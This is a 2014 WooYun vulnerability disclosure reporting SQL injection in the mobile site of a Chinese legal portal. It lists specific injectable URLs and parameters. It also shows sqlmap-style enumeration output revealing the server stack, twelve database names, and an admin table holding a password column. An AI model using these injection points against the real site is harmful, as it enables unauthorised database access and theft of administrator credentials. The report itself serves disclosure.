中国法律门户网站(Wap)SQL注入 | wooyun-2014-050962

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-050962

漏洞标题：

中国法律门户网站(Wap)SQL注入

漏洞详情

披露状态：

2014-02-24：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-04-10：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

SQL注入,MSSQL注入点可列12个数据库，一处access

详细说明：

MSSQL注入点：
http://m.law-lib.com/fzdt/news_content.asp?Artcle_id=78311
http://m.law-lib.com/cpws/cpwsml.asp?pages=2&type=cx
Access注入点：
http://m.law-lib.com/flsz/szml.asp?flh=a

漏洞证明：

MSSQL注入点：
http://m.law-lib.com/fzdt/news_content.asp?Artcle_id=78311
当前账户：

web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
current user:    'lw'

12个数据库：

available databases [12]:
[*] cpws
[*] hf_job_data
[*] lawbook
[*] lawlib
[*] llss
[*] lyzn
[*] master
[*] model
[*] msdb
[*] tempdb
[*] users
[*] zghzp2010

数据库llss暴露管理员账户：

Database: llss
[9 tables]
+---------------+
| LwComments    |
| N_admin       |
| N_admin_field |
| N_artcle      |
| N_assort      |
| N_system      |
| N_template    |
| dtproperties  |
| lw            |
+---------------+

Database: llss
Table: N_admin
[4 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| Admin_field    | nvarchar |
| Admin_id       | int      |
| Admin_name     | nvarchar |
| Admin_password | nvarchar |
+----------------+----------+

检测到此，没深入了，修复吧!
Access注入点：
http://m.law-lib.com/flsz/szml.asp?flh=a

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞